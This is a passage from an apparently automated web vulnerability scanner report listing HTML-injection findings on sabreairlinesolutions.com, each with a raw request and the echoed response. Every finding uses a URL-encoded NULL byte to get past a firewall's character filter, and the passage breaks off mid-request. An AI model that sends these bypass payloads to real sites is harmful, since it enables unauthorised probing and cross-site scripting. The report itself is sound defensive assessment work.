This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/?%00fe06e<a>db887c7418b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:36:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321370; expires=Thu, 06-Oct-2011 09:36:20 GMT; path=/
Set-Cookie: exp_last_activity=1286375780; expires=Thu, 06-Oct-2011 09:36:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>db887c7418b=1">?%00fe06e<a>db887c7418b=1</a>
...[SNIP]...

3.15. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00940ea<a>08244679985 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 940ea<a>08244679985 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive?%00940ea<a>08244679985=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321532; expires=Thu, 06-Oct-2011 09:48:49 GMT; path=/
Set-Cookie: exp_last_activity=1286376528; expires=Thu, 06-Oct-2011 09:48:49 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:49:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>08244679985=1">archive?%00940ea<a>08244679985=1</a>
...[SNIP]...

3.16. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006fa94"><a>536da431cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa94"><a>536da431cfe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive?%006fa94"><a>536da431cfe=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:45:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321532; expires=Thu, 06-Oct-2011 09:45:35 GMT; path=/
Set-Cookie: exp_last_activity=1286376334; expires=Thu, 06-Oct-2011 09:45:35 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:45:40 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/archive?%006fa94"><a>536da431cfe=1">
...[SNIP]...

3.17. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b09a0"><a>625cef8b535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b09a0"><a>625cef8b535 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive/?%00b09a0"><a>625cef8b535=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:31:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321342; expires=Thu, 06-Oct-2011 09:31:32 GMT; path=/
Set-Cookie: exp_last_activity=1286375492; expires=Thu, 06-Oct-2011 09:31:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:31:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/archive/?%00b09a0"><a>625cef8b535=1">
...[SNIP]...

3.18. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0056b2f<a>e425790b66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b2f<a>e425790b66b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive/?%0056b2f<a>e425790b66b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:35:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321342; expires=Thu, 06-Oct-2011 09:35:36 GMT; path=/
Set-Cookie: exp_last_activity=1286375736; expires=Thu, 06-Oct-2011 09:35:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:35:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>e425790b66b=1">?%0056b2f<a>e425790b66b=1</a>
...[SNIP]...

3.19. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008a5cb<a>8f6a559e1b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a5cb<a>8f6a559e1b8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact?%008a5cb<a>8f6a559e1b8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321540; expires=Thu, 06-Oct-2011 09:47:48 GMT; path=/
Set-Cookie: exp_last_activity=1286376467; expires=Thu, 06-Oct-2011 09:47:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A8%3A%22%2Fsearch%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:48:09 GMT
Pragma: no-cache
Content-Length: 7149
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>8f6a559e1b8=1">contact?%008a5cb<a>8f6a559e1b8=1</a>
...[SNIP]...

3.20. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00db425"><a>741209e189c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db425"><a>741209e189c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact?%00db425"><a>741209e189c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:43:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321540; expires=Thu, 06-Oct-2011 09:43:54 GMT; path=/
Set-Cookie: exp_last_activity=1286376234; expires=Thu, 06-Oct-2011 09:43:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A8%3A%22%2Fsearch%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:43:57 GMT
Pragma: no-cache
Content-Length: 7153
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/contact?%00db425"><a>741209e189c=1">
...[SNIP]...

3.21. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00666b7<a>50bee8d5c60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 666b7<a>50bee8d5c60 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact/?%00666b7<a>50bee8d5c60=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321376; expires=Thu, 06-Oct-2011 09:47:26 GMT; path=/
Set-Cookie: exp_last_activity=1286376444; expires=Thu, 06-Oct-2011 09:47:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:47:48 GMT
Pragma: no-cache
Content-Length: 7191
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>50bee8d5c60=1">?%00666b7<a>50bee8d5c60=1</a>
...[SNIP]...

3.22. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004de66"><a>0fefd7fbea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4de66"><a>0fefd7fbea2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact/?%004de66"><a>0fefd7fbea2=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
